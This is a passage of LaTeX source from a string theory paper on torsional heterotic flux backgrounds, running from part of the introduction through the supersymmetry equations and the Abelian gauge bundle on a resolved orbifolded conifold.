are usually far less understood that their type \textsc{iib} counterparts.\footnote{Note that duality can then applied to specific such heterotic models to map them to type \textsc{ii}
flux compactifications of interest for moduli stabilization~\cite{Dasgupta:1999ss,Becker:2002sx}.}
In particular having a non-trivial $\mathcal{H}$-flux threading the geometry results in the metric loosing K\"ahlerity (see~\cite{Goldstein:2002pg} for the analysis of $T^2$ fibrations over $K3$)
and being conformally balanced instead of Calabi-Yau~\cite{Mich,Ivanov:2000ai,LopesCardoso:2002hd}. This proves as a major drawback for the analysis of such backgrounds, as theorems of K\"ahler
geometry (such as Yau's theorem) do not hold anymore, making the existence of solutions to the tree-level supergravity equations dubious, let alone their extension to exact string vacua.
An additional and general complication for heterotic solutions comes from anomaly cancellation, which requires satisfying the Bianchi identity in the presence of torsion. This usually proves
notoriously arduous as this differential constraint is highly non-linear. A proof of the existence of a family of smooth solutions to the leading-order Bianchi identity has only
appeared recently~\cite{Fu:2006vj} (see also~\cite{Goldstein:2002pg} for an earlier discussion of $T^2\times K3$ fibrations, as well as~\cite{Becker:2006et,Fu:2008ga,Becker:2008rc} for developments).
Moduli spaces of heterotic compactifications have singularities, that arise whenever the gauge bundle degenerates to 'point-like instantons', either at regular points or at singular points of the
compactification manifold. In the case of $\mathcal{N}=1$ compactifications in six dimensions, the situation is well understood. Point-like instantons at regular points of $K3$ signals the appearance
of non-perturbative $Sp(k)$ gauge groups in the case of $Spin(32)/\mathbb{Z}_2$~\cite{Witten:1995gx}, while for $E_8 \times E_8$ one gets tensionless \textsc{bps} strings~\cite{Ganor:1996mu}, leading
to interacting \textsc{scft}s. In both cases,
the near-core 'throat' geometry of small instantons is given by the heterotic solitons of Callan, Harvey and Strominger~\cite{Callan:1991dj} (called thereafter \textsc{chs}), that become heterotic
five-branes in the point-like limit.
In the case of four-dimensional $\mathcal{N}=1$ \textsc{cy}$_3$ compactifications, let alone torsional vacua, the situation is less understood. For a particular class of \textsc{cy}$_3$ which are $K3$
fibrations, one can resort to the knowledge of the six-dimensional models mentioned above --~advocating an 'adiabatic' argument~-- in order to understand the physics in the vicinity of such singularities~\cite{Kachru:1996ci,Kachru:1997rs}.
Recently, a study of heterotic flux backgrounds, supporting an Abelian line bundle, has been initiated~\cite{Carlevaro:2008qf}.
In a specific double-scaling limit of these torsional vacua, the corresponding worldsheet non-linear sigma model has been shown to admit a solvable
\textsc{cft} description, belonging to a particular class of gauged \textsc{wzw} models, whose partition function and low-energy spectrum could be established.
In the double-scaling limit where this \textsc{cft} description emerges, one obtains non-compact torsional manifolds, that can be viewed as local models of
heterotic flux compactifications, in the neighborhood of singularities supporting Kalb-Ramond and magnetic fluxes. In analogy with the Klebanov--Strassler
(\textsc{ks}) solution~\cite{Klebanov:2000hb}, which plays a central role in understanding type \textsc{iib} flux backgrounds~\cite{Giddings:2001yu}, these
local models give a good handle on degrees of freedom localized in the 'throat' geometries.
The solutions we are considering correspond to the near-core geometry of 'small' gauge instantons sitting on geometrical singularities,
and their resolution. Generically, the torsional nature of the geometry can come solely from the {\it local} backreaction of the gauge instanton (as for the \textsc{chs}
solution that corresponds to a gauge instanton on a $K3$ manifold that is globally torsionless), or thought of being part of a {\it globally} torsional compactification.\footnote{For certain choices of
gauge bundle, the Eguchi-Hanson model that we studied in~\cite{Carlevaro:2008qf} could be of both types.} From the point of view
of the effective four- or six-dimensional theory, these solutions describe (holographically) the physics taking place at non-perturbative transitions of the
sort discussed above, or in their neighborhood in moduli space.
In the present work we concentrate on heterotic flux backgrounds preserving $\mathcal{N}=1$ supersymmetry in four dimensions. More specifically
we consider codimension four conifold singularities~\cite{Candelas:1989js}, supplemented by a non-standard gauge bundle which induces non-trivial torsion in the $SU(3)$ structure connection. For definiteness we opt for $Spin (32)/\mathbb{Z}_2$ heterotic string theory. The Bianchi identity is satisfied for an appropriate Abelian bundle, which solves the differential constraint in the large charge limit, where the curvature correction to the identity becomes sub-dominant. Subsequently, numerical solutions to the $\mathcal{N}=1$ supersymmetry equations~\cite{Strominger:1986uh} can be found, which feature non-K\"ahler spaces corresponding to warped torsional conifold geometries with a non-trivial dilaton. At large distance from the singularity, their geometry reproduces the usual Ricci-flat conifold, while in the bulk we observe a squashing of the $T^{1,1}$ base, as the radius of its $S^1$ fiber is varying.
The topology of this class of torsional spaces allows to resolve the conifold singularity by a blown-up $\mathbb{C}P^1 \times \mathbb{C}P^1$
four-cycle, provided we consider a $\mathbb{Z}_2$ orbifold of the original conifold space, that
avoids the potential bolt singularity. In contrast, in the absence of the orbifold only small resolution by a
blown-up two-cycle or deformation to a three-cycle remain as possible resolutions of the singularity. The specific de-singularisation we are considering here is particularly amenable to heterotic or
type~I constructions, as it leads to a normalizable harmonic two-form which can support an extra magnetic gauge flux (type \textsc{iib} conifolds with blown-up four-cycles and D3-branes were discussed in~\cite{PandoZayas:2001iw,Lu:2002rk,Benvenuti:2005qb}). The numerical supergravity solutions found in this case are perfectly smooth everywhere, and the string coupling can be chosen everywhere small,
while in the blow-down limit the geometrical singularity is also a strong coupling singularity.
In the regime where the blow-up parameter $a$ is significantly smaller (in string units) than the norm of the vectors of magnetic charges, one
can define a sort of 'near-horizon' geometry of this family of solutions, where the warp factor acquires a power-like behavior. This region can be decoupled from the
asymptotic Ricci-flat region by defining a double scaling limit~\cite{Carlevaro:2008qf} which sends the asymptotic string coupling $g_s$ to zero,
while keeping the ratio $g_s/ a^2$ fixed in string units.
In this limit we are able to find an analytical solution (that naturally gives an accurate
approximation of the asymptotically Ricci-flat solution in the near-horizon region of
the latter), where the dilaton becomes asymptotically linear, while the effective
string coupling, defined at the bolt, can be set to any value by the double-scaling parameter.
Remarkably, the double-scaling limit of this family of torsional heterotic backgrounds admits a
solvable worldsheet \textsc{cft} description, which we construct explicitly in terms of an asymmetric
gauged \textsc{wzw} model,\footnote{Notice that gauged \textsc{wzw} models for a class
of $T^{p,q}$ spaces have been constructed in~\cite{PandoZayas:2000he}. However these cosets, that are not heterotic in nature and do not support gauge bundles,
cannot be used to obtain supersymmetric string backgrounds.} which is parametrised by the two vectors $\vec{p}$ and $\vec{q}$ (dubbed hereafter 'shift vectors')
giving the embedding of the two magnetic fields in the Cartan subalgebra of $\mathfrak{so}(32)$. We establish this correspondence by showing that, integrating out
classically the worldsheet gauge fields, one obtains a non-linear sigma-model whose background fields reproduce the warped resolved orbifoldized conifold with flux.
This result generalizes the \textsc{cft} description for heterotic gauge bundles over Eguchi-Hanson (\textsc{eh}) space or \textsc{eh}$\times T^2$ we achieved in a previous work~\cite{Carlevaro:2008qf}.
The existence of a worldsheet \textsc{cft} for this class of smooth conifold solutions first implies that these backgrounds are exact heterotic string vacua to all orders in $\alpha'$, once included the worldsheet quantum corrections to the defining gauged \textsc{wzw} models.
This can be carried out by using the method developed in~\cite{Tseytlin:1992ri,Bars:1993zf,Johnson:2004zq} and usually amounts to a finite correction to the metric. Furthermore, this also entails that the Bianchi identity is exactly satisfied even when the magnetic charges are not large, at least in the near-horizon regime.
Then, by resorting to the algebraic description of coset \textsc{cft}s, we establish the full tree-level string spectrum
for these heterotic flux vacua, with special care taken in treating both discrete and continuous representations corresponding
respectively to states whose wave-functions are localized near the singularity, and to states whose wave-functions are delta-function normalizable.
Dealing with arbitrary shift vectors $\vec{p}$ and $\vec{q}$ in full generality turns out to be technically cumbersome, as the arithmetical
properties of their components play a role in the construction. We therefore choose to work out the complete solution of the theory
for a simple class of shift vectors that satisfy all the constraints. We compute the one-loop partition function in this case
(which vanishes thanks to space-time supersymmetry), and study in detail the spectrum of localized massless states.
In addition, the \textsc{cft} construction given here provides information about worldsheet instanton corrections. These worldsheet
non-perturbative effects are captured by Liouville-like interactions correcting the sigma-model action, that are expected to correspond to
worldsheet instantons wrapping one of the $\mathbb{C}P^1$s of the four-cycle. We subsequently analyze under which conditions the Liouville potentials
dictated by the consistency of the \textsc{cft} under scrutiny are compatible with the whole construction (in particular with the orbifold
and~\textsc{gso} projections). This allows to understand known constraints in heterotic supergravity vacua (such as the constraint
on the first Chern class of the gauge bundle) from a worldsheet perspective.
Finally, considering that in the double-scaling limit we mentioned above these heterotic torsional vacua feature an asymptotically linear dilaton, we argue that they should
admit a holographic description~\cite{Aharony:1998ub}. The dual theory should be a novel kind of little string theory, specified by
the shift vector $\vec{p}$ in the \textsc{uv}, flowing at low energies to a four-dimensional $\mathcal{N}=1$ field theory. This theory
sits on a particular branch in its moduli space, corresponding to the choice of second shift vector $\vec{q}$, and parametrized by
the blow-up mode. We use the worldsheet \textsc{cft} description of the gravitational dual in order to study the chiral operators of this
four-dimensional theory, thereby obtaining the R-charges and representations under the global symmetries for a particular class of them. From the
properties of the heterotic supergravity solution, we argue that the $Spin(32)/\mathbb{Z}_2$ blown-up backgrounds seem to be confining,
while for the $E_8\times E_8$ theory the blow-down limit gives an interacting superconformal field theory.
This work is organized as follows. Section~2 contains a short review of supersymmetric heterotic flux compactifications. In section~3 we obtain the heterotic supergravity backgrounds of interest, featuring torsional smooth conifold solutions.
We provide the numerical solutions for the full asymptotically Ricci-flat vacua together with
the analytical solution in the double-scaling limit. In addition we study the torsion classes of these solutions and their (non-)K\"ahlerity.
In section~4 we discuss the corresponding worldsheet \textsc{cft} by identifying the relevant heterotic gauged \textsc{wzw} model.
In section~5 we explicitly construct the complete one-loop partition function and analyze worldsheet non-perturbative effects.
Finally in section~6 we summarize our results and discuss two important aspects: the holographic duality
and the embedding of these non-compact torsional backgrounds in heterotic compactifications. In addition, some details about the gauged \textsc{wzw} models
at hand and general properties of superconformal characters are given in two appendices.
\section{$\mathcal{N}$=1 Heterotic vacua with Torsion}
In this section we review some known facts about heterotic supergravity and compactifications to four dimensions preserving $\mathcal{N}=1$ supersymmetry. This will
in particular fix the various conventions that we use in the rest of this work.
\subsection{Heterotic supergravity}
The bosonic part of the ten-dimensional heterotic supergravity action reads (in string frame):
\begin{equation}\label{het-lag-sugra}
S=\frac{1}{\alpha'^4}\int \mathrm{d}^{10}x \sqrt{-G}e^{-2\Phi}\,\Big[
R+4|\partial\Phi|^2-\frac{1}{2}|\mathcal{H}|^2+\frac{\alpha'}{4}\big(\mbox{Tr}_{\text{V}}|\mathcal{F}|^2+\text{tr}|\mathcal{R}_+|^2\big)
\Big]\,.
\end{equation}
with the norm of a $p$-form field strength $\mathcal{G}_{[p]}$ defined as $|\mathcal{G}|^2=\nicefrac{1}{p!}\,\mathcal{G}_{M_1..M_p}\mathcal{G}^{M_1..M_p}$. The trace of the Yang-Mills kinetic term is taken in the
vector representation of $SO(32)$ or $E_8\times E_8$.\footnote{We have chosen to work with anti-hermitian gauge fields, hence the positive sign in front of the gauge kinetic term.}
To be in keep with the modified Bianchi identity below~(\ref{bianchi}), we have included in~(\ref{het-lag-sugra}) the leading string correction to the supergravity Lagrangian. It involves the
generalized curvature two-form $\mathcal{R}(\Omega_{+})^{A}_{\phantom{A}B}$
built out of a Lorentz spin connexion $\Omega_+$ that incorporates torsion, generated by the presence of a non-trivial \textsc{nsns} three-form flux:\footnote{Its contribution to~(\ref{het-lag-sugra}) is normalized as
$\text{tr}|\mathcal{R}_+|^2= \tfrac12\, \mathcal{R}(\Omega_+)_{MN\,AB}\mathcal{R}(\Omega_+)^{MN\,AB}
$, the letters $M,N$ and $A,B$ denoting the ten-dimensional coordinate and frame indices, respectively.}
\begin{equation}\label{genO}
\Omega^{\phantom{\pm}A}_{\pm\,\phantom{A}B} = \omega^{A}_{\phantom{A}B} \pm \tfrac12 \mathcal{H}^{A}_{\phantom{A}B}\,.
\end{equation}
In addition to minimizing the action~(\ref{het-lag-sugra}), a heterotic vacuum has to fulfil the generalized Bianchi identity:
\begin{equation}\label{bianchi}
\mathrm{d} \mathcal{H}_{[3]} = 8\alpha'\pi^2 \Big[\text{ch}_2\big(V \big)-p_1\big(\mathcal{R}(\Omega_{+})\big)
\Big]\,,
\end{equation}
here written in terms of the first Pontryagin class of the tangent bundle and the second Chern character of the gauge bundle $V$. The second topological
term on the right hand side is the leading string correction to the Bianchi identity required by anomaly cancellation~\cite{Green:1984sg}, and mirrors the one-loop correction on the \textsc{lhs} of~(\ref{het-lag-sugra}).\footnote{
Actually, one can add any torsion piece to the spin connexion $\Omega_+$ without spoiling anomaly cancellation~\cite{Hull:1985dx}.}
By considering gauge and Lorentz Chern-Simons couplings, one can now construct an \textsc{nsns} three-form which exactly solves the modified Bianchi identity (\ref{bianchi}):
\begin{equation}\label{3form}
\mathcal{H}_{[3]}= \mathrm{d} \mathcal{B}_{[2]}+ \alpha' \big( \omega_{[3]}^{L}(\Omega_+)-\omega_{[3]}^{\textsc{ym}}(\mathcal{A})\big) \, ,
\end{equation}
thus naturally including tree-level and one-loop corrections, given by:
\begin{equation}\label{CSform}
\omega_{[3]}^{\textsc{ym}}(\mathcal{A}) = \text{Tr}_{\textsc{v}}\left[ \mathcal{A}\wedge \mathrm{d}\mathcal{A} + \tfrac23 \,\mathcal{A}\wedge\mathcal{A}\wedge\mathcal{A}\right]
\,, \qquad
\omega_{[3]}^{L}(\Omega_{+})=\text{tr}\left[ \Omega_+\wedge \mathrm{d}\Omega_+ + \tfrac23 \,\Omega_+\wedge\Omega_+ \wedge\Omega_+\right]\,.
\end{equation}
\subsection{$\mathcal{N}$=1 supersymmetry and SU(3) structure}
In the absence of fermionic background, a given heterotic vacuum can preserve a portion of supersymmetry if there exists at least one Majorana-Weyl spinor $\eta$ of $Spin(1,9)$ satisfying
\begin{equation}\label{covar}
\nabla^{-}_{M}\eta\equiv \big( \partial_M + \tfrac14\, \Omega_{-\phantom{AB}M}^{\phantom{-}AB} \,\Gamma_{AB}\big)\,\eta
=0\,.
\end{equation}
i.e. covariantly constant with respect to the connection with torsion $\Omega_-$ (note that the Bianchi identity is expressed using $\Omega_+$).
This constraint induces the vanishing of the supersymmetry variation of the graviton, so that in the presence of a non-trivial dilaton and gauge field
strength extra conditions have to be met, as we will see below.
In the presence of flux, the conditions on this globally invariant spinor are related
to the possibility for the manifold in question to possess a reduced structure group, or
$G$-structure, which becomes the $G$ holonomy of $\nabla^-$ when the fluxes vanish (see~\cite{Salomon,Joyce,Gauntlett:2003cy} for details and review).
The requirements for a manifold $\mathcal{M}_d$ to be endowed with a $G$-structure is tied to its
frame bundle admitting a sub-bundle with fiber group $G$. This in turn implies the existence of a set of globally defined $G$-invariant tensors,
or alternatively, spinors on $\mathcal{M}_d$.
As will be exposed more at length in section~\ref{torsion-cl}, the $G$-structure is specified by the intrinsic torsion of the manifold,
which measures the failure of the $G$-structure to become a $G$ holonomy of $\nabla^-$. By decomposing the intrinsic torsion into
irreducible $G$-modules, or torsion classes, we can thus consider classifying and determining the properties of different flux compactifications admitting the same $G$-structure.
\subsubsection*{Manifolds with SU(3) structure}
In the present paper, we will restrict to six-dimensional Riemannian spaces $\mathcal{M}_6$, whose reduced structure group is a subgroup of $SO(6)$, and focus on compactifications preserving
minimal ($\mathcal{N}=1$) supersymmetry in four dimensions, which calls for an $SU(3)$ structure group.\footnote{As a
general rule, reducing the dimension of the structure group increases the number of preserved supercharges.}
The structure is completely determined by a real two-form $J$ and a complex three-form $\Omega$,\footnote{The $SU(3)$ structure
is originally specified the chiral complex spinor $\eta$ solution of~(\ref{covar}), $J$ and $\Omega$ being then defined as
$J_{mn}=-i\eta^{\dagger}\Gamma_{mn}\eta$ and $\Omega_{mnp}=\eta^{\top}\Gamma_{mnp}\eta$ respectively. In the following however we will not resort to this formulation.} which are globally defined and
satisfy the relations:
\begin{equation}\label{topcond}
\Omega\wedge \bar\Omega = -\frac{4i}{3}\, J\wedge J\wedge J\,,
\qquad \qquad
J\wedge \Omega =0\,.
\end{equation}
The last condition is related to the absence of $SU(3)$-invariant vectors or, equivalently, five-forms.
The 3-form $\Omega$ suffices to determine an almost complex structure $\mathcal{J}_m^{\ n}$, satisfying $\mathcal{J}^2=-\mathbb{I}$,
such that $\Omega$ is $(3,0)$ and $J$ is $(1,1)$. The metric on $\mathcal{M}_6$ is then given by $g_{mn}=\mathcal{J}_m^{\phantom{m}l}J_{ln}$, and the orientation of $\mathcal{M}_6$ is implicit in the choice of volume-form $\text{Vol}(\mathcal{M}_6)=(J\wedge J\wedge J)/6$.
For a background including \textsc{nsns} three-form flux $\mathcal{H}$, the structure $J$ and $\Omega$ is generically not closed anymore, so that $\mathcal{M}_6$ now departs from the usual Ricci-flat
\textsc{cy}$_3$ background and $SU(3)$ holonomy is lost.
\subsubsection*{Supersymmetry conditions}
We consider a heterotic background in six dimensions specified by a metric $g$, a dilaton $\Phi$, a three-form $\mathcal{H}$ and a gauge field strength $\mathcal{F}$.
Leaving aside the gauge bundle for the moment, it can be shown that preserving $\mathcal{N}=1$ supersymmetry in six dimensions is strictly equivalent
to solving the differential system for the $SU(3)$ structure:\footnote{
The original and alternative and formulation \cite{Strominger:1986uh} to the supersymmetry conditions (\ref{susy-cond}-\ref{eqH}) replaces the constraint on the top form by
$|\Omega|=e^{-2\Phi}$,
which, inserted in eq.(\ref{susy-cond}), implies that the metric is conformally balanced \cite{Mich,Ivanov:2000ai,Becker:2006et}. The calibration equation for the flux (\ref{eqH}) can
also be rephrased as $\mathcal{H}=i(\bar{\partial}-\partial)J$.
This latter version of eq.(\ref{eqH}) is however restricted to the $SU(3)$-structure case, and does not lift to a general G-structure and dimension
$d$, unlike (\ref{susy-cond}a) by replacing $J$ by the appropriate calibration $(d-4)$-form $\Xi$ (see for instance \cite{Gauntlett:2001ur}).}
\begin{subequations}\label{susy-cond}
\begin{align}
\mathrm{d} (e^{-2\Phi}\,\Omega)&=0\,,\\
\mathrm{d} (e^{-2\Phi}\,J\wedge J)&=0\,,
\end{align}
\end{subequations}
with the \textsc{nsns} flux related to the structure as follows \cite{Gauntlett:2001ur}:
\begin{equation}\label{eqH}
e^{2\Phi}\,\mathrm{d}(e^{-2\Phi}\,J) = \star_6 \mathcal{H}\,.
\end{equation}
Let us pause awhile before tackling the supersymmetry constraint on the gauge fields and dwell on the signification of this latter expression. It has been observed that the
condition~(\ref{eqH}) reproduces a generalized K\"ahler calibration equation for $\mathcal{H}$~\cite{Gutowski:1999iu,Gutowski:1999tu}, since it is defined by the $SU(3)$-invariant $J$. If we adopt a brane interpretation of a background with \textsc{nsns} flux, this equation acquires significance as a minimizing condition for the energy functional of five-branes wrapping K\"ahler two-cycles in $\mathcal{M}_6$. As noted in~\cite{Gauntlett:2003cy}, this analysis in term of calibration is still valid even when considering the full back-reaction of the brane configuration on the geometry.\footnote{The argument is that we can always add in this case an extra probe five-brane without breaking supersymmetry, provided it wraps a two-cycle calibrated by the same invariant form as the one calibrating the now back-reacted solution, hence the name \it{generalized} calibration.}
\subsection{Constraints on the gauge bundle}
We will now turn to the conditions the gauge field strength has to meet in order to preserve
$\mathcal{N}=1$ supersymmetry and to ensure the absence of global worldsheet anomalies.
Unbroken supersymmetry requires the vanishing of the gaugino variation:
\begin{equation}\label{gaugino}
\delta \chi = \frac14\,\mathcal{F}_{MN} \,\Gamma^{MN} \epsilon = 0\,.
\end{equation}
We see that since the covariantly constant spinor $\eta$ is a singlet of the connection $\nabla^-$,
taking $\mathcal{F}$ in the adjoint of the structure group $SU(3)$ will not break any extra supersymmetry, thus automatically satisfying~(\ref{gaugino}).
This is tantamount to requiring $\mathcal{F}$ to be an instanton of $SU(3)$:
\begin{equation}\label{Finstanton}
\mathcal{F}_{mn}= -\frac{1}{4}\,\big(J\wedge J\big)_{mn}^{\phantom{mn}kl}\,\mathcal{F}_{kl}
\qquad \Longleftrightarrow\qquad
\star_6 \mathcal{F}=-\mathcal{F}\wedge J\,.
\end{equation}
As pointed out in \cite{Strominger:1986uh}, this condition is equivalent to require the gauge bundle $V$ to satisfy the zero-slope limit of the Hermitian Yang-Mills equation:
\begin{subequations}\label{hym}
\begin{align}
\mathcal{F}^{(2,0)}= \mathcal{F}^{(0,2)}&=0\,, \\ \mathcal{F}^{a\bar b}J_{a\bar b}&=0\,.
\end{align}
\end{subequations}
The first equation entails that the gauge bundle has to be a holomorphic gauge bundle while the second is the tree-level Donaldson-Uhlenbeck-Yau (\textsc{duy}) condition which is satisfied for $\mu$-stable bundles.
In addition, a line bundle is subject to a condition ensuring the absence of global anomalies in the heterotic worldsheet sigma-model~\cite{Witten:1985mj,Freed:1986zx}. This condition
(also known as K-theory constraint in type~I) amounts to a Dirac quantization condition for the $Spin(32)$ spinorial representation of positive chirality, that
appears in the massive spectrum of the heterotic string. It forces the first Chern class of the gauge bundle $V$ over $\mathcal{M}_6$ to be in the second even integral cohomology group.
In this work we consider only Abelian gauge backgrounds, hence the bundle needs to satisfy the condition:
\begin{equation}\label{Kth}
c_1(V) \in H^2(\mathcal{M},2\mathbb{Z}) \, \Longrightarrow \,\sum_{i=1}^{16} \int_{\Sigma_I} \frac{\mathcal{F}^i}{2\pi}\equiv 0 \mbox{ mod }2\,,\quad I=1,..,h_{1,1} \, .
\end{equation}
\section{Resolved Heterotic Conifolds with Abelian Gauge Bundles}
The supergravity solutions we are interested in are given as
a non-warped product of four-dimensional Minkowski space with a six-dimensional
non-compact manifold supporting \textsc{nsns} flux and an Abelian gauge bundle.
They preserve minimal supersymmetry ($\mathcal{N}=1$) in four dimensions and can be viewed
as local models of flux compactifications. For definiteness we choose $Spin(32)/\mathbb{Z}_2$ heterotic strings.
More specifically we take as metric ansatz a warped conifold geometry~\cite{Candelas:1989js}. The singularity is resolved by a K\"ahler deformation corresponding to blowing up a
$\mathbb{C} P^1\times \mathbb{C} P^1$ four-cycle on the conifold base. This is topologically possible only for a $\mathbb{Z}_2$ orbifold of the conifold, see below.\footnote{Without an orbifold the conifold singularity can be smoothed
out only by a two-cycle (resolution) or a three-cycle (deformation).} The procedure is
similar to that used in~\cite{PandoZayas:2001iw,Benvenuti:2005qb} to construct a smooth Ricci-flat orbifoldized conifold
by a desingularization \`a la Eguchi-Hanson. In our case however we have in addition non-trivial flux back-reacting on the geometry and deforming it away from Ricci-flatness by generating torsion in the background.
The geometry is conformal to a six-dimensional smoothed cone over a $T^{1,1}$ space.\footnote{We recall that $T^{1,1}$ is the coset
space $(SU(2)\times SU(2))/U(1)$ with the $U(1)$ action embedded symmetrically in the two $SU(2)$ factors.} It has therefore an
$SU(2)\times SU(2)\times U(1)$ group of continuous isometries. Considering $T^{1,1}$ as an $S^1$ fibration over a $\mathbb{C} P^1\times \mathbb{C} P^1$ base, the metric component in front of the fiber will be dependent on the radial coordinate of the cone, hence squashing $T^{1,1}$ away from the Einstein metric.
The metric and \textsc{nsns} three-form ans\"atze of the heterotic supergravity solution are chosen of the following form:
\begin{subequations} \label{sol-ansatz}
\begin{align}
\mathrm{d} s^2 & = \eta_{\mu\nu}\mathrm{d} x^{\mu}\mathrm{d} x^{\nu} +\tfrac{3}{2}\,H(r) \,\biggl[
\frac{\mathrm{d} r^2}{f^2(r)} +
\frac{r^2}{6}\big(\mathrm{d}\theta_1^2+\sin^2\theta_1\,\mathrm{d}\phi_1^2 + \mathrm{d}\theta_2^2+\sin^2\theta_2\,\mathrm{d}\phi_2^2\big) \notag\\
& \hspace{2cm} +\,\frac{r^2}{9} f(r)^2 \big(\mathrm{d} \psi + \cos \theta_1 \,\mathrm{d} \phi_1 + \cos \theta_2 \,\mathrm{d} \phi_2 \big)^2 \biggr]\,,\\
\mathcal{H}_{[3]} & = \frac{\alpha'k}{6}\,g_1(r)^2\,\big( \Omega_1+\Omega_2\big)\wedge \tilde{\omega}_{[1]} \,,
\end{align}
\end{subequations}
with the volume forms of the two $S^2$s and the connection one-form $\tilde{\omega}_{[1]}$ defined by
\begin{subequations}
\begin{align}
\Omega_i&=\sin \theta_i \,\mathrm{d} \theta_i\wedge \mathrm{d} \phi_i\,,\quad \text{for }i=1,2\,,\qquad
\tilde{\omega}_{[1]} = \mathrm{d} \psi + \cos \theta_1 \,\mathrm{d} \phi_1 + \cos \theta_2 \,\mathrm{d} \phi_2\,.
\end{align}
\end{subequations}
In addition, non-zero \textsc{nsns} flux induces a nontrivial dilaton $\Phi(r)$, while satisfying the Bianchi identity requires an Abelian gauge bundle, which will be discussed below.
The resolved conifold geometry in~(\ref{sol-ansatz}a), denoted thereafter by $\tilde{\mathcal{C}}_6$, is topologically equivalent to the
total space of the line bundle $\mathcal{O}(-K)\rightarrow \mathbb{C} P^1 \times \mathbb{C} P^1$. The resolution of the singularity is governed by the
function $f(r)$ responsible for the squashing of $T^{1,1}$. Indeed the zero locus of this function defines the blowup mode $a$ of the conifold,
related to the product of the volumes of the two $\mathbb{C} P^1$'s.
Asymptotically in $r$, the numerical solutions that will be found below are such that both $f$ and $H$ tend to constant values,
according to $\text{lim}_{r\rightarrow \infty}f=1$ and $\text{lim}_{r\rightarrow \infty} H=H_{\infty}$, hence the known Ricci-flat conifold metric is restored at infinity (however without
the standard embedding of the spin connexion in the gauge connexion (see below).
To determine the background explicitly, we impose the supersymmetry conditions~(\ref{susy-cond}) and the Bianchi identity~(\ref{bianchi}) on the the ansatz~(\ref{sol-ansatz}),
which implies~\cite{deWit:1986xg,Gauntlett:2002sc} solving the equations of motion for the Lagrangian~(\ref{het-lag-sugra}). In addition, one has to implement the condition~(\ref{Kth}),
thereby constraining the magnetic charges specifying the Abelian gauge bundle.
\subsection{The supersymmetry equations}
To make use of the supersymmetry equations~(\ref{susy-cond}) and the calibration condition for the flux~(\ref{eqH}), we choose the following complexification of the vielbein:
\begin{equation}\label{complex-vielbein}
E^1=e^2+ie^3\,, \qquad E^2=e^4+ie^5\,, \qquad E^3=e^1+ie^6\,.
\end{equation}
written in terms of the left-invariant one-forms on $T^{1,1}$:
\begin{equation}\label{vielbn}
\begin{array}{ll}
e^1=\sqrt{\frac{3H}{2}}\frac1f\,\mathrm{d} r\, &
\quad e^6= \frac{r\sqrt{H}f}{\sqrt{6}}\,\tilde\omega\\[5pt]
e^2= \frac{r \sqrt{H}}{2}\,\big(\sin\frac{\psi}{2}\,\mathrm{d} \theta_1- \cos\frac{\psi}{2}\sin\theta_1\,\mathrm{d}\phi_1\big)\,, &\quad
e^3= -\frac{r\sqrt{H}}{2}\,\big(\cos\frac{\psi}{2}\,\mathrm{d} \theta_1+ \sin\frac{\psi}{2}\sin\theta_1\,\mathrm{d}\phi_1\big)\,, \\[5pt]
e^4= \frac{r\sqrt{H}}{2}\,\big(\sin\frac{\psi}{2}\,\mathrm{d} \theta_2- \cos\frac{\psi}{2}\sin\theta_2\,\mathrm{d}\phi_2\big) \,,& \quad
e^5= -\frac{r\sqrt{H}}{2}\,\big(\cos\frac{\psi}{2}\,\mathrm{d} \theta_2+ \sin\frac{\psi}{2}\sin\theta_2\,\mathrm{d}\phi_2\big)\,.
\end{array}
\end{equation}
The corresponding $SU(3)$ structure then reads:
\begin{subequations}
\label{complexbasis}
\begin{align}
\Omega_{[3,0]} &= E^1\wedge E^2 \wedge E^3 \equiv e^{124}-e^{135}-e^{256}-e^{346}+i
\big(e^{125}+e^{134}+e^{246}-e^{356}\big)\,, \\
J_{[1,1]} &=\frac{i}{2} \sum_{a=1}^3 E^a\wedge \bar E^a \equiv e^{16}+e^{23}+e^{45}\,.
\end{align}
\end{subequations}
Imposing the supersymmetry conditions~(\ref{susy-cond}) leads the following system of first order differential equations:
\begin{subequations} \label{susy-system}
\begin{align}
&f^2 H' = f^2 H\,\Phi' = -\frac{2\alpha'k \,g_1^2}{r^3} \,,\\
&r^3H f f'+3r^2 H\,(f^2-1) +\alpha'k\, g_1^2=0\,.
\end{align}
\end{subequations}
\subsection{The Abelian gauge bundle}
To solve the Bianchi identity~(\ref{bianchi}), at least in the large charge limit, one can consider an Abelian gauge bundle,
supported both on the four-cycle $\mathbb{C} P^1\times \mathbb{C} P^1$ and on the $S^1$ fiber of the squashed $T^{1,1}/\mathbb{Z}_2$:
\begin{equation}\label{gauge-ansatz}
\mathcal{A}_{[1]}=\tfrac{1}{4}\Big(\left(\cos\theta_1\,\mathrm{d}\phi_1 - \cos \theta_2\,\mathrm{d} \phi_2 \right)\vec{p} + g_2(r)\,\tilde\omega\,\vec{q}\Big) \cdot \vec{H}\,.
\end{equation}
where $\vec{H}$ spans the 16-dimensional Cartan subalgebra of $\mathfrak{so}(32)$ and the $H^i$, $i=1,..,16$ are chosen anti-Hermitean, with Killing
form $K(H^i,H^j)=-2\delta_{ij}$. The solution is characterized by two {\it shift vectors}\footnote{This terminology is borrowed from the
orbifold limit of some line bundles over singularities, see $e.g.$~\cite{Nibbelink:2007rd}.} $\vec{p}$ and $\vec{q}$ that
specify the Abelian gauge bundle and are required to satisfy $\vec{p}\cdot\vec{q}=0$. The function $g_2(r)$
will be determined by the \textsc{duy} equations.
The choice~(\ref{gauge-ansatz}) is the most general ansatz of line bundle over the manifold~(\ref{sol-ansatz}a)
satisfying the holomorphicity condition~(\ref{hym}a). Then, to fulfil the remaining supersymmetry condition, we rewrite:
\begin{equation}\label{FS}
\begin{array}{rcl}
\mathcal{F}_{[2]} & = &
{\displaystyle -\tfrac{1}{4} \Big[\big(\Omega_1-\Omega_2\big)\,\vec{p}
+\big( g_2(r)(\Omega_1+\Omega_2)
-g_2'(r)\,\mathrm{d} r\wedge \tilde{\omega}\big)\,\vec{q} \,\Big]\cdot \vec{H} } \\[7pt]
& =& -{\displaystyle \frac{i}{r^2H}\Big[
\big(E^1\wedge \bar E^1 - E^2\wedge \bar E^2 \big)\,\vec{p} +
\big( g_2 \,(E^1\wedge \bar E^1 + E^2\wedge \bar E^2) + \tfrac12 rg_2'\, E^3\wedge \bar
E^3\big)\vec q
\,\Big] \cdot \vec{H}}
\end{array}
\end{equation}
so that imposing (\ref{hym}b) fixes:
\begin{equation}\label{g2-prof}
g_2(r)=\left(\frac a r\right)^4 \,.
\end{equation}
In defining this function we have introduced a scale $a$ which is so far a free real parameter of the solution.
